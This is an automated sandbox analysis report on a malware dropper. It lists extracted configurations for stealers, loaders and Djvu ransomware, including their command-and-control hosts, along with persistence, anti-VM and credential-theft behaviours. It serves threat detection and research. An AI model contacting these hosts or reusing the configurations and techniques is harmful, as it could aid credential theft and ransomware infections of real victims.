Resubmissions
23-10-2021 15:52
211023-tbkbesdcfm 1022-10-2021 17:40
211022-v8trsscggr 1022-10-2021 15:55
211022-tc9ygacgan 1022-10-2021 14:38
211022-rz1bfabgb8 10Analysis
-
max time kernel
289s -
max time network
410s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
22-10-2021 14:38
Static task
static1
Behavioral task
behavioral1
Sample
Fri051e1e7444.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
Fri051e1e7444.exe
Resource
win7-en-20210920
Behavioral task
behavioral3
Sample
Fri051e1e7444.exe
Resource
win7-de-20211014
Behavioral task
behavioral4
Sample
Fri051e1e7444.exe
Resource
win11
Behavioral task
behavioral5
Sample
Fri051e1e7444.exe
Resource
win10-ja-20211014
Behavioral task
behavioral6
Sample
Fri051e1e7444.exe
Resource
win10-en-20210920
Behavioral task
behavioral7
Sample
Fri051e1e7444.exe
Resource
win10-de-20210920
General
-
Target
Fri051e1e7444.exe
-
Size
403KB
-
MD5
b4c503088928eef0e973a269f66a0dd2
-
SHA1
eb7f418b03aa9f21275de0393fcbf0d03b9719d5
-
SHA256
2a95ce43c87b8a26be71a459eae796a572422bd99cf0b9a3580a3a68e7dbd1a2
-
SHA512
c6fe2e2b5fbf9348701d1721f2b7ac7589b04b0308ae152e3a7186692b14f35e55bc7eed0c94a03031837b6f2b6aa4dc8d094aefce02913f1fbc4dedea452465
Malware Config
Extracted
vidar
41.5
937
https://mas.to/@xeroxxx
-
profile_id
937
Extracted
raccoon
1.8.1
874dee7d322070fc6dc34b3b6cd43904077db44d
-
url4cnc
https://telete.in/isuzoShadowhunter
Extracted
smokeloader
2020
http://gejajoo7.top/
http://sysaheu9.top/
Extracted
redline
205.185.119.191:60857
Extracted
raccoon
7c9b4504a63ed23664e38808e65948379b790395
-
url4cnc
http://telegka.top/capibar
http://telegin.top/capibar
https://t.me/capibar
Extracted
vidar
41.5
916
https://mas.to/@xeroxxx
-
profile_id
916
Extracted
vidar
41.5
921
https://mas.to/@xeroxxx
-
profile_id
921
Extracted
vidar
41.5
933
https://mas.to/@xeroxxx
-
profile_id
933
Extracted
icedid
1875681804
Extracted
djvu
http://rlrz.org/lancer
Signatures
-
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5200 3616 rundll32.exe 158 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6664 3616 rundll32.exe 158 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
resource yara_rule behavioral6/memory/2460-209-0x0000000004C30000-0x0000000004C4F000-memory.dmp family_redline behavioral6/memory/2460-255-0x0000000004E90000-0x0000000004EAD000-memory.dmp family_redline behavioral6/memory/4944-363-0x0000000000418B0E-mapping.dmp family_redline behavioral6/memory/2264-377-0x00000000004368BE-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral6/files/0x000400000001abc1-135.dat family_socelars behavioral6/files/0x000400000001abc1-134.dat family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
description pid Process procid_target PID 4516 created 1172 4516 WerFault.exe 92 PID 1736 created 2148 1736 WerFault.exe 88 PID 3364 created 10872 3364 WerFault.exe 244 -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 9 IoCs
resource yara_rule behavioral6/memory/3592-179-0x0000000000E30000-0x0000000000F06000-memory.dmp family_vidar behavioral6/memory/3592-176-0x0000000000400000-0x00000000008E3000-memory.dmp family_vidar behavioral6/memory/2996-257-0x0000000002D80000-0x0000000002E58000-memory.dmp family_vidar behavioral6/memory/1036-299-0x0000000000C50000-0x0000000000D26000-memory.dmp family_vidar behavioral6/memory/1036-301-0x0000000000400000-0x00000000008F1000-memory.dmp family_vidar behavioral6/files/0x000400000001ac1d-309.dat family_vidar behavioral6/files/0x000400000001ac1d-308.dat family_vidar behavioral6/memory/4564-445-0x0000000000D80000-0x0000000000E56000-memory.dmp family_vidar behavioral6/memory/4564-449-0x0000000000400000-0x00000000008F1000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts DYbALA.exe -
Executes dropped EXE 64 IoCs
pid Process 1040 0XBqGgfq5YtuPiFuiEtC0Itj.exe 2132 t5BHfszhim40psf0Ku5XwE1g.exe 1804 hgLhV7VJCm2E5ZeR2koRQLem.exe 1360 fMihVGAjzzxUqeGpoFzxWund.exe 1056 iIvH5FxG4UqEvw9X0aMhKsh5.exe 2996 bqGFbzTHh6GxWpbCl2pSkDt8.exe 3592 AVX02z0lmiqaeiefNhJSJk7I.exe 2232 xxXvuV4EWPaBs23hksyUdxBE.exe 3732 b2chrkPKq8rLN77N8Rq8Yask.exe 2148 BjtGsfsmZrBx_hOFQo5f7e1N.exe 2460 y3CTXvi1Cp2Ojy7XgUMJ61TV.exe 2864 enKbTHFfgmbEDWWc3Iwn2kpk.exe 2516 vKWWQ13x_IxdTnJBebOhylKA.exe 4072 1Olo_be130gb5SrdgovhC8zX.exe 2948 8OD2RNk52y6HyC_UHdjnbYIC.exe 3080 bpet4Jfh0Jl3fT6UUfUcDOBu.exe 3024 aZuHKLVs32nDMGT9GPDzQQKX.exe 2828 12xR7jc7fLIwbgrjD6aub8vg.exe 2196 fMihVGAjzzxUqeGpoFzxWund.exe 1172 vKWWQ13x_IxdTnJBebOhylKA.exe 1592 cutm3.exe 1432 pLEyAg1mYliSL5jFWBNHmVOT.exe 692 fftI1ws3DMgP3nFLvVTxe0_x.exe 3204 DownFlSetup999.exe 2960 JuvbRlwjWPdBcD_UwijL0gMs.exe 2960 JuvbRlwjWPdBcD_UwijL0gMs.exe 1036 ivph15pXbD4NCZsVAjvIYlRP.exe 400 uipDdhmRp9eBVZ0eHdxCRnhK.exe 1920 lwi7kJfiwWPFinTHRNx5r5xN.exe 4420 build.exe 4772 uipDdhmRp9eBVZ0eHdxCRnhK.tmp 4944 hgLhV7VJCm2E5ZeR2koRQLem.exe 4984 pLEyAg1mYliSL5jFWBNHmVOT.exe 4448 DYbALA.exe 4000 pLEyAg1mYliSL5jFWBNHmVOT.exe 2264 pLEyAg1mYliSL5jFWBNHmVOT.exe 4856 LzmwAqmV.exe 4508 8pWB.eXE 4728 BCleanSoft86.exe 4564 Soft1WW02.exe 2488 setup.exe 4320 inst2.exe 1508 svchost.exe 4044 askinstall60.exe 4260 6.exe 5140 setup.exe 5236 ligr-game.exe 5364 customer7.exe 5320 setup.tmp 5488 setup_2.exe 5556 sfx.exe 5620 10.exe 5688 Calculator Installation.exe 3756 LzmwAqmV.exe 1508 svchost.exe 4788 kPBhgOaGQk.exe 4452 setup.exe 6132 1Olo_be130gb5SrdgovhC8zX.exe 1396 1Olo_be130gb5SrdgovhC8zX.exe 3788 FarLabUninstaller.exe 5160 NDP472-KB4054531-Web.exe 5520 D6EA.exe 4368 postback.exe 4236 D6EA.exe -
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8OD2RNk52y6HyC_UHdjnbYIC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion b2chrkPKq8rLN77N8Rq8Yask.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion bpet4Jfh0Jl3fT6UUfUcDOBu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8OD2RNk52y6HyC_UHdjnbYIC.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion bpet4Jfh0Jl3fT6UUfUcDOBu.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8098.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8098.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 12xR7jc7fLIwbgrjD6aub8vg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 12xR7jc7fLIwbgrjD6aub8vg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion b2chrkPKq8rLN77N8Rq8Yask.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Fri051e1e7444.exe Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Tyzhipaetele.exe -
Loads dropped DLL 47 IoCs
pid Process 1920 lwi7kJfiwWPFinTHRNx5r5xN.exe 1920 lwi7kJfiwWPFinTHRNx5r5xN.exe 3592 AVX02z0lmiqaeiefNhJSJk7I.exe 3592 AVX02z0lmiqaeiefNhJSJk7I.exe 4772 uipDdhmRp9eBVZ0eHdxCRnhK.tmp 1920 lwi7kJfiwWPFinTHRNx5r5xN.exe 4420 build.exe 1036 ivph15pXbD4NCZsVAjvIYlRP.exe 4420 build.exe 1036 ivph15pXbD4NCZsVAjvIYlRP.exe 1920 lwi7kJfiwWPFinTHRNx5r5xN.exe 1920 lwi7kJfiwWPFinTHRNx5r5xN.exe 1920 lwi7kJfiwWPFinTHRNx5r5xN.exe 1508 svchost.exe 5320 setup.tmp 5688 Calculator Installation.exe 5688 Calculator Installation.exe 5688 Calculator Installation.exe 5688 Calculator Installation.exe 5688 Calculator Installation.exe 4564 Soft1WW02.exe 4564 Soft1WW02.exe 5688 Calculator Installation.exe 4452 setup.exe 4452 setup.exe 4444 rundll32.exe 5736 Setup.exe 5736 Setup.exe 6096 msiexec.exe 6096 msiexec.exe 10852 msiexec.exe 10852 msiexec.exe 10844 installer.exe 10844 installer.exe 5092 autosubplayer.exe 10844 installer.exe 5172 MsiExec.exe 5172 MsiExec.exe 5092 autosubplayer.exe 6692 rundll32.exe 6672 EAFC.exe 4452 setup.exe 4452 setup.exe 7868 Calculator.exe 7868 Calculator.exe 4452 setup.exe 7868 Calculator.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 8700 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral6/files/0x000400000001abc6-169.dat themida behavioral6/files/0x000200000001ab28-168.dat themida behavioral6/files/0x000400000001abbf-157.dat themida behavioral6/memory/2948-233-0x0000000001120000-0x0000000001121000-memory.dmp themida behavioral6/memory/3080-225-0x0000000000AF0000-0x0000000000AF1000-memory.dmp themida behavioral6/memory/3732-222-0x0000000000BE0000-0x0000000000BE1000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\FarLabUninstaller\\Gyxogasufi.exe\"" DYbALA.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --loGQqfG2tg" setup.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA b2chrkPKq8rLN77N8Rq8Yask.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA bpet4Jfh0Jl3fT6UUfUcDOBu.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8OD2RNk52y6HyC_UHdjnbYIC.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA aZuHKLVs32nDMGT9GPDzQQKX.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA svchost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 8098.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 12xR7jc7fLIwbgrjD6aub8vg.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\A: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\W: installer.exe File opened (read-only) \??\Z: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\E: installer.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 30 ipinfo.io 173 ipinfo.io 174 ipinfo.io 651 api.2ip.ua 29 ipinfo.io 161 ip-api.com 365 ip-api.com 591 api.2ip.ua 614 api.2ip.ua -
Drops file in System32 directory 7 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\686AD3B12FDB68487AAEA92D0A823EB3 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
pid Process 3732 b2chrkPKq8rLN77N8Rq8Yask.exe 3080 bpet4Jfh0Jl3fT6UUfUcDOBu.exe 2948 8OD2RNk52y6HyC_UHdjnbYIC.exe 4408 8098.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 1360 set thread context of 2196 1360 fMihVGAjzzxUqeGpoFzxWund.exe 91 PID 2516 set thread context of 1172 2516 vKWWQ13x_IxdTnJBebOhylKA.exe 92 PID 1804 set thread context of 4944 1804 hgLhV7VJCm2E5ZeR2koRQLem.exe 115 PID 1432 set thread context of 2264 1432 pLEyAg1mYliSL5jFWBNHmVOT.exe 122 PID 4072 set thread context of 1396 4072 1Olo_be130gb5SrdgovhC8zX.exe 194 PID 5520 set thread context of 4236 5520 D6EA.exe 204 PID 1256 set thread context of 4928 1256 svchost.exe 206 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup.tmp File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\status.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvc1_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libclone_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe setup.tmp File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\03_lastfm.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe xxXvuV4EWPaBs23hksyUdxBE.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libadummy_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\mobile.css autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\Other-48.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\librtp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\FarLabUninstaller\is-MJA1O.tmp setup.tmp File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.json autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libnetsync_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libfingerprinter_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst3.exe enKbTHFfgmbEDWWc3Iwn2kpk.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\httprequests.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\appletrailers.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\liveleak.luac autosubplayer.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\cutm3.exe enKbTHFfgmbEDWWc3Iwn2kpk.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\speaker-32.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\playlist.json autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\jamendo.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\libvlccore.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libdummy_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\common.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\controllers.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libcaf_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\logger\libconsole_logger_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\main.css autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\telnet.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\reader\filename.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\00_musicbrainz.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_wasapi_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_h264_plugin.dll autosubplayer.exe File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat setup.tmp File created C:\Program Files (x86)\lighteningplayer\lua\sd\jamendo.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_realrtsp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libdemux_cdg_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_dummy_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\vlm.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libau_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\libsubsdelay_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\dkjson.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\stream_config_window.html autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\youtube.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libaccess_concat_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_copy_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\spu\librss_plugin.dll autosubplayer.exe -
Drops file in Windows directory 7 IoCs
description ioc Process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdgeCP.exe File created C:\Windows\System\xxx1.bak 12xR7jc7fLIwbgrjD6aub8vg.exe File created C:\Windows\System\svchost.exe 12xR7jc7fLIwbgrjD6aub8vg.exe File opened for modification C:\Windows\System\svchost.exe 12xR7jc7fLIwbgrjD6aub8vg.exe File created C:\Windows\System\xxx1.bak svchost.exe File created C:\Windows\rescache\_merged\3720402701\2274612954.pri MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 25 IoCs
pid pid_target Process procid_target 1644 2148 WerFault.exe 88 5092 2148 WerFault.exe 88 4516 1172 WerFault.exe 92 2284 2148 WerFault.exe 88 4368 2148 WerFault.exe 88 1736 2148 WerFault.exe 88 5772 5488 WerFault.exe 164 5920 5488 WerFault.exe 164 6008 5488 WerFault.exe 164 196 5488 WerFault.exe 164 5584 4260 WerFault.exe 157 4888 5488 WerFault.exe 164 1864 5488 WerFault.exe 164 5152 5488 WerFault.exe 164 4812 5488 WerFault.exe 164 11088 10872 WerFault.exe 244 11244 10872 WerFault.exe 244 4688 10872 WerFault.exe 244 4692 10872 WerFault.exe 244 836 3160 WerFault.exe 258 5000 3160 WerFault.exe 258 5452 3160 WerFault.exe 258 4104 3160 WerFault.exe 258 5844 3160 WerFault.exe 258 3364 10872 WerFault.exe 244 -
NSIS installer 4 IoCs
resource yara_rule behavioral6/files/0x000400000001ac1b-291.dat nsis_installer_1 behavioral6/files/0x000400000001ac1b-291.dat nsis_installer_2 behavioral6/files/0x000400000001ac1b-320.dat nsis_installer_1 behavioral6/files/0x000400000001ac1b-320.dat nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 9 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fMihVGAjzzxUqeGpoFzxWund.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fMihVGAjzzxUqeGpoFzxWund.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI EAFC.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D6EA.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI EAFC.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI EAFC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI fMihVGAjzzxUqeGpoFzxWund.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D6EA.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI D6EA.exe -
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AVX02z0lmiqaeiefNhJSJk7I.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString AVX02z0lmiqaeiefNhJSJk7I.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ivph15pXbD4NCZsVAjvIYlRP.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 build.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Soft1WW02.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ivph15pXbD4NCZsVAjvIYlRP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString build.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Soft1WW02.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Setup.exe -
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4508 schtasks.exe 4588 schtasks.exe 6052 schtasks.exe 10704 schtasks.exe -
Delays execution with timeout.exe 6 IoCs
pid Process 2584 timeout.exe 6560 timeout.exe 4528 timeout.exe 5180 timeout.exe 1056 timeout.exe 5940 timeout.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
pid Process 1608 bitsadmin.exe -
Kills process with taskkill 12 IoCs
pid Process 4400 taskkill.exe 4808 taskkill.exe 10008 taskkill.exe 7248 taskkill.exe 10004 taskkill.exe 3728 taskkill.exe 4236 taskkill.exe 188 taskkill.exe 6136 taskkill.exe 1316 taskkill.exe 5528 taskkill.exe 6504 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe -
Modifies data under HKEY_USERS 16 IoCs
